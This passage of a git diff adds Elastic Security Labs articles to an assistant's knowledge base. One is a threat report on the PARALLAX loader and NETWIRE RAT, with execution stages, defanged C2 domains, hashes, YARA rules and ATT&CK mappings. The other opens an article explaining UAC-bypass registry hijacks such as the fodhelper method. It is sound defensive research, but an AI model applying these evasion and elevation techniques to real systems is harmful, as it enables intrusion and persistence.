+If the first string of ( **cs16.cfg** ) points to a hosted file, it uses the [**IBackgroundCopyManager**](https://learn.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager) Component Object Model (COM) interface to download a PNG file and store it on disk ( **paper.png** in our example).
+
+![Downloading the PNG file using BITS](/assets/images/exploring-the-ref2731-intrusion-set/image38.jpg)
+
+The malware extracts a configuration structure from the stenographically-obfuscated PNG that contains the next PARALLAX loader stage and the final payload; in our sample, we identified the final payload as the NETWIRE RAT, but this process could be used to deliver other payloads.
+
+![Stenographically obfuscated PNG file](/assets/images/exploring-the-ref2731-intrusion-set/image7.jpg)
+
+The malware executes position independent shellcode that reads and decodes the PNG file, it first extracts the red pixel bytes to an array by parsing the PNG, then decompresses the data with the [LZMA algorithm](https://www.winzip.com/en/learn/tips/what-is-lzma/).
+
+![Decompressing PNG extracted data](/assets/images/exploring-the-ref2731-intrusion-set/image33.jpg)
+
+Next, it creates a suspended **cmd.exe** process and injects the NETWIRE payload and the last PARALLAX stage that will set up the environment and execute the NETWIRE payload.
+
+![Process tree of the malware’s execution](/assets/images/exploring-the-ref2731-intrusion-set/image19.jpg)
+
+Below is the memory regions showing the injected process hosting the NETWIRE payload:
+
+![Injected NETWIRE payload in a cmd.exe process](/assets/images/exploring-the-ref2731-intrusion-set/image22.jpg)
+
+### Fifth Stage
+
+The fifth and final stage of PARALLAX Loader performs a UAC bypass through **CMSTPLUA** COM interface, a technique that has been used by ransomware-like LockBit, it then sets persistence on the system before executing the final payload by creating a scheduled task to run **Msidb.exe** using Component Object Model (COM).
+
+![Scheduled task to run MsiDb.exe](/assets/images/exploring-the-ref2731-intrusion-set/image32.jpg)
+
+## Campaign Analysis
+
+Throughout the analysis of the lure documents and malware families, we observed two campaigns associated with their TTPs, malware, network infrastructure, and lure metadata.
+
+The intersections we observed allowed us to observe additional network infrastructure and identify the characteristics of one infrastructure owner in Campaign 1.
+
+In the following sections, we will describe relevant elements and artifacts associated with each campaign, as well as their relationships.
+
+This section will be focused on campaign intersections. As each campaign functioned similarly with respect to their technical implementation (lure document -\\> macro -\\> defense evasion techniques -\\> PARALLAX loader -\\> NETWIRE RAT), we’ll use the analysis of the five stages for the deployment of the PARALLAX and NETWIRE malware that has been described in detail in the previous Execution Flow section.
+
+While we are not attributing these campaigns to any specific threat actor, we have identified parallel research leveraging the same TTPs that we observed. This research was attributed to the financially motivated threat group, Evilnum [[1](https://attack.mitre.org/groups/G0120/), [2](https://malpedia.caad.fkie.fraunhofer.de/actor/evilnum)] and the [DarkCasino campaign](http://blog.nsfocus.net/darkcasino-apt-evilnum/).
+
+### Campaign 1
+
+#### Overview
+
+This campaign is clustered by shared lure document metadata, network infrastructure, dropped macro, and malicious DLL ( **msi.dll** ) **.**
+
+![Campaign 1 node-link analysis](/assets/images/exploring-the-ref2731-intrusion-set/image28.jpg)
+
+#### Lure Documents
+
+The three lure documents used in Campaign 1 were all macro-embedded Microsoft Word documents. The documents were all 153 pages long, with the macro embedded on the 3rd page. The documents all included the H1 Word [document header](https://support.microsoft.com/en-us/office/add-a-heading-3eb8b917-56dc-4a17-891a-a026b2c790f2) of **Как я искал Гантмахера** (loosely translated to: “How I searched for Gantmakher”). Vsevolod Gantmakher was a Russian physicist.
+
+Extracting the metadata for all three documents, we can see their relationships based on several fields; most notably:
+
+- The identical **HeadingPairs** (the names of the Word document header).
+- The identical **CreationDate** dates.
+- The identical **LastPrinted** dates.
+- The **ModifyDate** dates are all within 14-minutes.
+
+![Campaign 1 lure document metadata](/assets/images/exploring-the-ref2731-intrusion-set/image17.jpg)
+
+The H1 document header of the lure documents does not appear relevant to the targeting as the lure document names and lure document content are wholly unrelated: two of the three document names were related to 2021 United States tax filings, all three of the document names are in English, and the contents of the lure documents are in Cyrillic.
+
+#### Macro
+
+The macro downloads five files, detailed in the Execution Flow section above **(cs16.wav**, **msi.dll** , **MsiDb.exe** , **paper.png** , and **cs16.cfg** ), from a different domain for each lure document.
+
+![Campaign 1 macro-downloaded files](/assets/images/exploring-the-ref2731-intrusion-set/image2.jpg)
+
+#### Network Infrastructure
+
+Campaign 1 included three domains contacted by the macro to download artifacts required for stages two through five (described in the “Execution Flow” section above) and three domains used for the NETWIRE RAT C2.
+
+The six domains are:
+
+- digitialrotprevention[.]com - macro-connected.
+- internationalmusicservices[.]com - macro-connected.
+- globalartisticservices[.]com - macro-connected.
+- ohioohioa[.]com - NETWIRE C2.
+- ywiyr[.]com - NETWIRE C2.
+- septton[.]com - NETWIRE C2.
+
+The macro-connected domains (digitialrotprevention[.]com, internationalmusicservices[.]com, and globalartisticservices[.]com) include metadata that has allowed us to cluster these three domains together in Campaign 1.
+
+![Campaign 1 network infrastructure](/assets/images/exploring-the-ref2731-intrusion-set/image29.jpg)
+
+In the above image, the Admin email address and Admin user name is russnet123@protonmail[.]com and **rus fam** , respectively. As of this writing, these domains have been suspended.
+
+> Our research identified an additional domain, micsupportcenter[.]com that had the same Admin email address and Admin user name. The lure document included similar US tax document themes, macro elements, and TTPs; but we were unable to confirm that it was part of this campaign. This lure document was first observed in May of 2022 and is possibly part of a testing wave, but this is speculation. We are confident this is a malicious domain and are including it as an indicator artifact for this intrusion set, but not this campaign.
+
+Once the execution flow reaches the Fourth Stage (described in the Execution Flow section above), the final three domains (ohioohioa[.]com, ywiyr[.]com, and septton[.]com) act as ongoing command and control nodes for the NETWIRE RAT.
+
+While ​​ohioohioa[.]com and ywiyr[.]com are protected by privacy services, septton[.]com has interesting metadata that we were able to collect and is outlined below in the SEPTTON Domain section below.
+
+#### Campaign 1 Indicators
+
+| Name                                                             | STIX 2.1 Indicator Type | Identifier                                        |
+| ---------------------------------------------------------------- | ----------------------- | ------------------------------------------------- |
+| bc9f19ae835d975de9aaea7d233b6ea9b2bc30f80d192af2e8e68542b588917e | SHA-256                 | Brian_Tax_Docs.doc lure document                  |
+| d70365481fb4806130743afd199697eb981a0eb2756754ecc548f5b30c2203a5 | SHA-256                 | VIRGINIA-TAX-RETURN-2021-US-EXT.doc lure document |
+| 9dd709cb989d985a6cfee4a254f894a3b878a03962dbf253cb09a24ece455d58 | SHA-256                 | All Docs.doc lure document                        |
+| 16227f50bbe42a13a2abf0bf0e146f356863de59525c54909ea8ccc2db448f77 | SHA-256                 | msi.dll PARALLAX loader / NETWIRE                 |
+| 0c8c431a1f589fdcf453c7afada63c2e2e2a887e49abdbb222983fa6044fdf66 | SHA-256                 | cs16.wav (shellcode)                              |
+| 6ed65beb692301af5296ba6751063ae40e91c4e69ced43560c67ce58165c36b5 | SHA-256                 | cs16.cfg (config for PNG stage)                   |
+| 5f259757741757c78bfb9dab2cd558aaa8403951c1495dc86735ca73c33d877f | SHA-256                 | paper.png (stager for NETWIRE)                    |
+| globalartisticservices[.]com                                     | domain-name             | PARALLAX loader domain                            |
+| DigitalRotPrevention[.]com                                       | domain-name             | PARALLAX loader domain                            |
+| InternationalMusicServices[.]com                                 | domain-name             | PARALLAX loader domain                            |
+| russnet123@protonmail[.]com                                      | email-addr              | PARALLAX loader domain registration email address |
+| chisholm.i@aol[.]com                                             | email-addr              | NETWIRE C2 domain registration email address      |
+| ywiry[.]com                                                      | domain-name             | NETWIRE C2 domain                                 |
+| ohioohioa[.]com                                                  | domain-name             | NETWIRE C2 domain                                 |
+| septton[.]com                                                    | domain-name             | NETWIRE C2 domain                                 |
+
+### Campaign 2
+
+#### Overview
+
+This campaign is clustered through its lure document metadata, network infrastructure, dropped macro, and malicious DLL ( **msvcr100.dll** ).
+
+![Campaign 2 node-link analysis](/assets/images/exploring-the-ref2731-intrusion-set/image24.jpg)
+
+#### Lure Documents
+
+The lure document used in Campaign 2 is a macro-embedded Microsoft Word document. The document metadata differentiates it from Campaign 1 based on the **LastModifiedBy** field and the macro network infrastructure.
+
+![Campaign 2 lure document metadata](/assets/images/exploring-the-ref2731-intrusion-set/image10.jpg)
+
+The document name was also related to 2021 United States tax filings.
+
+#### Macro
+
+Like Campaign 1, the macro downloads several files. Beyond the DLL file ( **msvcr100.dll** ), all files were offline before they could be collected. Based on the TTPs observed in this campaign, we assess with high confidence that they **(java.exe**, **Fruit.png** , **idea.cfg** , and **idea.mp3** ) function similarly to the files from Campaign 1 and detailed in the Execution Flow section above.
+
+![Campaign 2 macro-downloaded files](/assets/images/exploring-the-ref2731-intrusion-set/image13.jpg)
+
+Additional details about the Campaign 1 and Campaign 2 file relationships are in the “Campaign intersections” section below.
+
+#### Network Infrastructure
+
+Campaign 2 included one domain contacted by the macro to download artifacts required for stages two through five (described in detail in the “Execution Flow” section above). Additionally, there was one domain used for the NETWIRE RAT C2.
+
+The two domains are:
+
+- solro14.s3.ap-northeast-3.amazonaws[.]com - macro-connected
+- ohioohioa[.]com - NETWIRE C2
+
+Once the execution flow reaches stage four, ohioohioa[.]com acts as the ongoing command and control node for the NETWIRE RAT.
+
+#### Campaign 2 Indicators
+
+| Name                                                             | STIX 2.1 Indicator Type | Identifier                                 |
+| ---------------------------------------------------------------- | ----------------------- | ------------------------------------------ |
+| solro14.s3.ap-northeast-3.amazonaws[.]com                        | domain-name             | PARALLAX loader domain                     |
+| 32fc0d1ad678133c7ae456ecf66c3fcf97e43abc2fdfce3ad3dce66af4841f35 | SHA-256                 | 2021-Individual-Tax-Form.doc lure document |
+| 443879ee2cb3d572bb928d0831be0771c7120968e442bafe713a6e0f803e8cd9 | SHA-256                 | msvcr100.dll PARALLAX loader / NETWIRE     |
+| ohioohioa[.]com                                                  | domain-name             | NETWIRE C2 domain                          |
+
+## Campaign Intersections
+
+Campaign 1 and Campaign 2 intersect in several ways.
+
+As illustrated in the image below, each campaign relied on a lure document (or documents) to execute a macro that contacted adversary-owned or controlled domains; downloaded artifacts used to install and protect the PARALLAX and NETWIRE RAT implants. Additionally, in both campaigns we analyzed, there is a shared network infrastructure used for the NETWIRE C2.
+
+![Campaign 1 and Campaign 2 intersections](/assets/images/exploring-the-ref2731-intrusion-set/image16.jpg)
+
+### The Pyramid of Pain
+
+In 2013 (and updated in 2014), security researcher David Bianco released an analytical model called the [Pyramid of Pain](http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html). The model is intended to understand how uncovering different parts of an intrusion can impact a campaign. As you can see in the model below, the identification of hash values is useful, but easily changed by an adversary whereas identifying TTPs is very difficult for an adversary to change.
+
+![The Pyramid of Pain](/assets/images/exploring-the-ref2731-intrusion-set/image4.jpg)
+
+The goal of using the Pyramid of Pain is to understand as much about the intrusion as possible and project the impact (read: the amount of "pain") you can inflict.
+
+When analyzing the two campaigns, we can put the Pyramid of Pain into action.
+
+- **Hash values** - each lure document had a unique hash.
+- **IP addresses** - each network connection leveraged a different IP address.
+- **Domain names** - each network connection leveraged exclusive domains for the macro components but shared a NETWIRE C2 domain (ohioohioa[.]com).
+- **Network/host artifacts**
+
+  - Identically-named host artifacts observed in Campaign 1.
+  - Renamed from Campaign 1, but functionally identical, host artifacts observed in Campaign 2.
+  - Artifact bundles from both campaigns include similarly formatted and functionally identical files.
+
+- **Tools** - macro-enabled Word document lures, and PARALLAX and NETWIRE RATs.
+- **TTPs** - complex and defensive five-staged execution chain.
+
+Looking across both campaigns, we can see there is some shared infrastructure at the Domain Names tier in the NETWIRE C2 domain (ohioohioa[.]com). In the Network/host artifacts tier we can see additional intersections between the campaigns.
+
+![Network/host artifacts](/assets/images/exploring-the-ref2731-intrusion-set/image3.jpg)
+
+In both campaigns, we can see a PE file ( **MsiDb.exe** and **java.exe** ), a DLL file ( **msi.dll** and **msvcr100.dll** ), a PNG file ( **paper.png** and **Fruit.png** ), an audio-format named file ( **cs16.wav** and **idea.mp3** ), and a configuration file ( **cs16.cfg** and **idea.cfg** ) at the Network/host artifact tier. All downloaded files in Campaign 1 are named the same across all three lure documents. In both campaigns, the audio-format named files have the same base name as the configuration files ( **cs16.wav** / **cs16.cfg** and **idea.mp3** / **idea.cfg** ). In both campaigns, we assess with high confidence that all host artifacts are functionally identical as described in the Execution Flow section above.
+
+## The SEPTTON Domain
+
+As reported in the Campaign 1 section, most of the network infrastructure was either well-used across multiple intrusions unrelated to our campaigns or protected by domain privacy services.
+
+An exception to that is the seppton[.]com domain, which was used as the C2 node for a NETWIRE RAT implant in our sampling. Continuing to analyze this domain, we observed several other associated malicious files. While we did not independently verify the family of malware that is communicating with this domain, signature names in VirusTotal include NETWIRE.
+
+> It should be noted that signature names in VirusTotal alone do not present enough information to provide a high-confidence conviction of a malware sample to a malware family.
+
+![septton[.]com file relationships](/assets/images/exploring-the-ref2731-intrusion-set/image5.jpg)
+
+Looking through the registration information for the domain, we observed two elements of note, both email addresses - marketforce666@yandex[.]com and chisholm.i@aol[.]com.
+
+![septton[.]com domain registration](/assets/images/exploring-the-ref2731-intrusion-set/image37.jpg)
+
+In the next two sections, we’ll discuss the resource development for domains used in campaigns.
+
+### marketforce666
+
+Searching for **marketforce666** in a search engine did not return results of value from the United States; however, when changing to an Internet egress point within Russia and using the Yandex search engine (Yandex is a Russian Internet services provider), we identified 802 results that show this term has been associated with multiple abuse reports.
+
+![marketforce666 Yandex search engine results](/assets/images/exploring-the-ref2731-intrusion-set/image18.jpg)
+
+When expanding our search for domains registered by marketforce666@yandex[.]com, we identified three additional domains. We did not observe these additional domains in our campaigns, but we are including them as indicator artifacts. Below are the four total domains (one from Campaign 1 and three additional) that were registered by, either as the admin, tech, or registrant address, marketforce666@yandex[.]com.
+
+![Domains registered to marketforce666@yandex[.]com](/assets/images/exploring-the-ref2731-intrusion-set/image31.jpg)
+
+### gaza666
+
+Looking at the other email address, chisholm.i@aol[.]com, we were able to connect this email address with a moniker of **gaza666** from the online forum and marketplace, Infected Zone.
+
+On this forum, the user **gaza666** attempted to purchase (`https://infected-zone[.]com/threads/2814/`) an “Office 365 Complete Package” from the online seller **rzkyo**. **gaza666** and the seller **rzkyo** engaged in a dispute on the forum where **gaza666** did not believe they received what they purchased - which was a package for email spamming and four United States Office 365 accounts but received three nonfunctional and non-Office 365 Phillipino accounts. The seller, **rzkyo** , responded and the two debated what was purchased and what was delivered. The dispute was responded to by a moderator who attempted to resolve the issue.
+
+![Invoice email where gaza666 purchased infrastructure from rzkyo](/assets/images/exploring-the-ref2731-intrusion-set/image15.png)
+
+![Invoice where gaza666 is linked to chisholm.i@aol[.]com](/assets/images/exploring-the-ref2731-intrusion-set/image14.png)
+
+The results of the dispute were not in the forum, but there were several screenshots where **rzkyo** showed **gaza666** and the moderators that the services they sold were functional.
+
+![SMTP credentials from rzkyo to gaza666](/assets/images/exploring-the-ref2731-intrusion-set/image27.png)
+
+![Setup of online SMTP testing service](/assets/images/exploring-the-ref2731-intrusion-set/image34.png)
+
+![Test from email spam accounts purchased from rzkyo](/assets/images/exploring-the-ref2731-intrusion-set/image11.png)
+
+While it is unknown if the infrastructure above that **gaza666** attempted to purchase from **rzkyo** was used in our observed campaigns (or ever used at all), but **gaza666** is associated with chisholm.i@aol[.]com, which was used to register septton[.]com, and septton[.]com was used as a NETWIRE C2 node in Campaign 1.
+
+![gaza666 involvement in NETWIRE C2 in Campaign 1](/assets/images/exploring-the-ref2731-intrusion-set/image39.jpg)
+
+**marketforce666** (marketforce666@yandex[.]com) and **gaza666** (chisholm.i@aol[.]com) share a relationship in that both emails were used in the registration of septton[.]com, which was used as a NETWIRE C2 domain for Campaign 1. The **666** term appended to **marketforce** and **gaza** could be another indicator of their relationship, but this could not be confirmed.
+
+## Diamond Model
+
+Elastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between adversaries and victims of intrusions.
+
+![REF2731 diamond model](/assets/images/exploring-the-ref2731-intrusion-set/image8.png)
+
+## Observed Adversary Tactics and Techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
+
+### Tactics
+
+Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Resource Development](https://attack.mitre.org/tactics/TA0042/)
+- [Initial Access](https://attack.mitre.org/tactics/TA0001/)
+- [Execution](https://attack.mitre.org/tactics/TA0002/)
+- [Persistence](https://attack.mitre.org/tactics/TA0003/)
+- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004/)
+- [Defense Evasion](https://attack.mitre.org/tactics/TA0004/)
+- [Command and Control](https://attack.mitre.org/tactics/TA0011/)
+
+### Techniques / Sub techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Acquire Infrastructure: Domains](https://attack.mitre.org/techniques/T1583/001/)
+- [Phishing: Attachment](https://attack.mitre.org/techniques/T1566/001/)
+- [Hijack Execution Flow: DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/)
+- [Process Injection](https://attack.mitre.org/techniques/T1055/)
+- [Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)
+- [Native API](https://attack.mitre.org/techniques/T1106/)
+- [Obfuscated Files or Information: Steganography](https://attack.mitre.org/techniques/T1027/003/)
+- [Abuse Elevation Control Mechanism: Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002/)
+
+## Detection
+
+### Detection Logic
+
+The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set.
+
+**Behavioral Rules**
+
+- [NetWire RAT Registry Modification](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_netwire_rat_registry_modification.toml)
+- [Remcos RAT Registry or File Modification](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_remcos_rat_registry_or_file_modification.toml)
+
+**Detection Rules**
+
+- [Persistence via Scheduled Job Creation](https://www.elastic.co/guide/en/security/current/persistence-via-scheduled-job-creation.html)
+- [Command Prompt Network Connection](https://www.elastic.co/guide/en/security/current/command-prompt-network-connection.html)
+
+**Signatures**
+
+- [Windows.Trojan.Parallax](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Parallax.yar)
+- [Windows.Trojan.Netwire](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Netwire.yar)
+- [Windows.Trojan.Remcos](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Remcos.yar)
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity.
+
+```
+rule Windows_Trojan_Parallax_1 {
+    meta:
+        author = “Elastic Security”
+        creation_date = "2022-09-05"
+        last_modified = "2022-09-15"
+        license = “Elastic License v2”
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Parallax"
+        threat_name = "Windows.Trojan.Parallax"
+    strings:
+        $COM_png = { B9 01 00 00 00 6B D1 00 C6 44 15 D4 83 B8 01 00 00 00 C1 E0 00 C6 44 05 D4 B6 B9 01 00 00 00 D1 E1 C6 44 0D D4 33 BA 01 00 00 00 6B C2 03 C6 44 05 D4 28 B9 01 00 00 00 C1 E1 02 C6 44 0D D4 36 BA 01 00 00 00 6B C2 05 C6 44 05 D4 6B B9 01 00 00 00 6B D1 06 C6 44 15 D4 90 B8 01 00 00 00 6B C8 07 C6 44 0D D4 97 }
+        $png_parse = { 8B 4D ?? 8B 04 B8 85 C9 74 ?? 8B F1 90 8A 08 8D 40 ?? 88 0C 1A 42 83 EE ?? 75 ?? 8B 4D ?? 8B 45 ?? 47 3B 7D ?? 72 ?? }
+        $config_func = { C7 45 F8 68 74 74 70 8B ?? ?? 8B 02 89 ?? ?? 6A 08 8D ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 8B ?? ?? 52 8D ?? ?? 50 8B ?? ?? 8B 51 0C FF D2 }
+        $winnet_function = { B8 77 00 00 00 66 89 ?? ?? B9 69 00 00 00 66 89 ?? ?? BA 6E 00 00 00 66 89 ?? ?? B8 69 00 00 00 66 89 ?? ?? B9 6E 00 00 00 66 89 ?? ?? BA 65 00 00 00 66 89 ?? ?? B8 74 00 00 00 66 89 ?? ?? 33 C9 66 89 ?? ?? 8D ?? ?? 52 8B ?? ?? 8B 48 1C FF D1 }
+    condition:
+        $config_func or $winnet_function or $COM_png or $png_parse
+}
+
+rule Windows_Trojan_Parallax_2 {
+    meta:
+        author = “Elastic Security”
+        creation_date = "2022-09-08"
+        last_modified = "2022-09-08"
+        license = “Elastic License v2”
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Parallax"
+        threat_name = "Windows.Trojan.Parallax"
+    strings:
+        $parallax_payload_strings_0 = "[Ctrl +" ascii wide fullword
+        $parallax_payload_strings_1 = "[Ctrl]" ascii wide fullword
+        $parallax_payload_strings_2 = "Clipboard Start" ascii wide fullword
+        $parallax_payload_strings_3 = "[Clipboard End]" ascii wide fullword
+        $parallax_payload_strings_4 = "UN.vbs" ascii wide fullword
+        $parallax_payload_strings_5 = "lt +" ascii wide fullword
+        $parallax_payload_strings_6 = "lt]" ascii wide fullword
+        $parallax_payload_strings_7 = ".DeleteFile(Wscript.ScriptFullName)" ascii wide fullword
+        $parallax_payload_strings_8 = ".DeleteFolder" ascii wide fullword
+        $parallax_payload_strings_9 = ".DeleteFile " ascii wide fullword
+        $parallax_payload_strings_10 = "Scripting.FileSystemObject" ascii wide fullword
+        $parallax_payload_strings_11 = "On Error Resume Next" ascii wide fullword
+        $parallax_payload_strings_12 = "= CreateObject" ascii wide fullword
+        $parallax_payload_strings_13 = ".FileExists" ascii wide fullword
+    condition:
+        7 of ($parallax_payload_strings_*)
+}
+```
+
+## PARALLAX Payload Extractor
+
+Automating the payload extraction from PARALLAX is a key aspect when it comes to threat hunting as it gives visibility of the campaign and the malware deployed by the threat actors which enable us to discover new unknown samples in a timely manner.
+
+Our extractor takes either a directory of samples with **-d** option or **-f** for a single sample, You can use the **-o** switch to set the output directory of the payloads.
+
+![Payload extraction from a PARALLAX sample](/assets/images/exploring-the-ref2731-intrusion-set/image6.png)
+
+To enable the community to further defend themselves against existing and new variants of the PARALLAX loader, we are making the payload extractor open source under the Apache 2 License. The payload extractor documentation and binary download can be accessed [here](https://www.elastic.co/security-labs/parallax-payload-extractor).
+
+## Conclusion
+
+In the above research, we have analyzed the two campaigns that we’ve tracked using macro-embedded lure documents that download seemingly benign artifacts from the staging hosts on the Internet, and weaponize those artifacts to perform persistence, command and control, and remote access of an infected host.
+
+We also highlighted the elements used to cluster the two campaigns together and how the campaigns can be used with analytical models to impose costs on the campaign owners.
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://blog.morphisec.com/parallax-rat-active-status](https://blog.morphisec.com/parallax-rat-active-status)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax](https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax)
+- [https://attack.mitre.org/software/S0198/](https://attack.mitre.org/software/S0198/)
+- [https://attack.mitre.org/groups/G0120/](https://attack.mitre.org/groups/G0120/)
+- [https://malpedia.caad.fkie.fraunhofer.de/actor/evilnum](https://malpedia.caad.fkie.fraunhofer.de/actor/evilnum)
+- [http://blog.nsfocus.net/darkcasino-apt-evilnum/](http://blog.nsfocus.net/darkcasino-apt-evilnum/)
+
+## Indicators
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc090b3574bb4e7be/633615e4a920fd42f67e7534/ref2731-indicators.zip) in both ECS and STIX format in a combined zip bundle.
+
+| Name                                                             | STIX 2.1 Indicator Type | Identifier                                        |
+| ---------------------------------------------------------------- | ----------------------- | ------------------------------------------------- |
+| bc9f19ae835d975de9aaea7d233b6ea9b2bc30f80d192af2e8e68542b588917e | SHA-256                 | Brian_Tax_Docs.doc lure document                  |
+| d70365481fb4806130743afd199697eb981a0eb2756754ecc548f5b30c2203a5 | SHA-256                 | VIRGINIA-TAX-RETURN-2021-US-EXT.doc lure document |
+| 9dd709cb989d985a6cfee4a254f894a3b878a03962dbf253cb09a24ece455d58 | SHA-256                 | All Docs.doc lure document                        |
+| 16227f50bbe42a13a2abf0bf0e146f356863de59525c54909ea8ccc2db448f77 | SHA-256                 | msi.dll PARALLAX loader / NETWIRE                 |
+| 0c8c431a1f589fdcf453c7afada63c2e2e2a887e49abdbb222983fa6044fdf66 | SHA-256                 | cs16.wav (shellcode)                              |
+| 6ed65beb692301af5296ba6751063ae40e91c4e69ced43560c67ce58165c36b5 | SHA-256                 | cs16.cfg (config for PNG stage)                   |
+| 5f259757741757c78bfb9dab2cd558aaa8403951c1495dc86735ca73c33d877f | SHA-256                 | paper.png (stager for NETWIRE)                    |
+| 321d840a23b54bb022ff3a5dcac837e7aec14f66e3ec5e6da5bfeebec927a46c | SHA-256                 | 2021-EXTENSION.doc lure document                  |
+| 443879ee2cb3d572bb928d0831be0771c7120968e442bafe713a6e0f803e8cd9 | SHA-256                 | msvcr100.dll PARALLAX loader / NETWIRE            |
+| globalartisticservices[.]com                                     | domain-name             | PARALLAX loader domain                            |
+| DigitalRotPrevention[.]com                                       | domain-name             | PARALLAX loader domain                            |
+| InternationalMusicServices[.]com                                 | domain-name             | PARALLAX loader domain                            |
+| ywiry[.]com                                                      | domain-name             | NETWIRE C2 domain                                 |
+| ohioohioa[.]com                                                  | domain-name             | NETWIRE C2 domain                                 |
+| septton[.]com                                                    | domain-name             | NETWIRE C2 domain                                 |
+| solro14.s3.ap-northeast-3.amazonaws[.]com                        | domain-name             | PARALLAX loader domain                            |
+| mikemikemic[.]com                                                | domain-name             | Domains registered by marketforce666@yandex[.]com |
+| ppl-biz[.]com                                                    | domain-name             | Domains registered by marketforce666@yandex[.]com |
+| opnarchitect[.]net                                               | domain-name             | Domains registered by marketforce666@yandex[.]com |
+| micsupportcenter[.]com                                           | domain-name             | PARALLAX loader domain                            |
+| russnet123@protonmail[.]com                                      | email-addr              | PARALLAX loader domain registration email address |
+| chisholm.i@aol[.]com                                             | email-addr              | NETWIRE C2 domain registration email address      |
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_windows_uac_bypasses_techniques_and_detection_strategies.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_windows_uac_bypasses_techniques_and_detection_strategies.md
new file mode 100644
index 0000000000000..6652cb57e63ee
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_windows_uac_bypasses_techniques_and_detection_strategies.md
@@ -0,0 +1,365 @@
+---
+title: "Exploring Windows UAC Bypasses: Techniques and Detection Strategies"
+slug: "exploring-windows-uac-bypasses-techniques-and-detection-strategies"
+date: "2023-05-15"
+description: "In this research article, we will take a look at a collection of UAC bypasses, investigate some of the key primitives they depend on, and explore detection opportunities."
+author:
+  - slug: samir-bousseaden
+image: "llustration-desktop-security-webinar-1680x980.jpg"
+category:
+  - slug: security-operations
+  - slug: detection-science
+---
+
+Malware often requires full administrative privileges on a machine to perform more impactful actions such as adding an antivirus exclusion, encrypting secured files, or injecting code into interesting system processes. Even if the targeted user has administrative privileges, the prevalence of [User Account Control](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) (UAC) means that the malicious application will often default to Medium Integrity, preventing write access to resources with [higher integrity levels](https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control). To bypass this restriction, an attacker will need a way to elevate integrity level silently and with no user interaction (no [UAC prompt](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/images/uacconsentprompt.gif)). This technique is known as a User Account Control [bypass](https://attack.mitre.org/techniques/T1548/002/) and relies on a variety of primitives and conditions, the majority of which are based on piggybacking elevated Windows features.
+
+Example of cscript.exe running as Medium spawning a cmd.exe instance with High integrity via a UAC bypass:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image12.jpg)
+
+Most of UAC validation logic is implemented in the Application Information (AppInfo) service. A great primer about the elevation conditions and the different checks can be found [here](https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e).
+
+In this blog post, we will take a look at a collection of UAC bypasses, investigate some of the key primitives they depend on, and explore detection opportunities.
+
+## UAC Bypass Methods
+
+UAC bypass methods usually result in hijacking the normal execution flow of an elevated application by spawning a malicious child process or loading a malicious module inheriting the elevated integrity level of the targeted application.
+
+There are some other edge cases but the most common hijack methods are:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image16.png)
+
+## Registry Key Manipulation
+
+The goal of manipulating a registry key is to redirect the execution flow of an elevated program to a controlled command. The most abused key values are related to shell open commands for specific extensions (depending on the targeted program) or windir/systemroot[environment variables manipulation](https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html):
+
+- HKCU\\Software\\Classes\\\<targeted_extension\\>\\shell\\open\command (Default or DelegateExecute values)
+- HKCU\\Environment\\windir
+- HKCU\\Environment\\systemroot
+
+For instance, when fodhelper (a Windows binary that allows elevation without requiring a UAC prompt) is launched by malware as a Medium integrity process, Windows automatically elevates fodhelper from a Medium to a High integrity process. The High integrity fodhelper then attempts to open an ms-settings file using its default handler. Since the medium-integrity malware has hijacked this handler, the elevated fodhelper will execute a command of the attacker’s choosing as a high integrity process.
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image19.jpg)
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image13.jpg)
+
+Below is an example of [Glupteba](https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba) malware leveraging this method to first elevate from a Medium to High integrity process, then from High to System integrity via Token Manipulation:
+
+![](/assets/images/exploring-windows-uac-bypasses-techniques-and-detection-strategies/exploring-windows-uac-bypasses-image20.jpg)
+
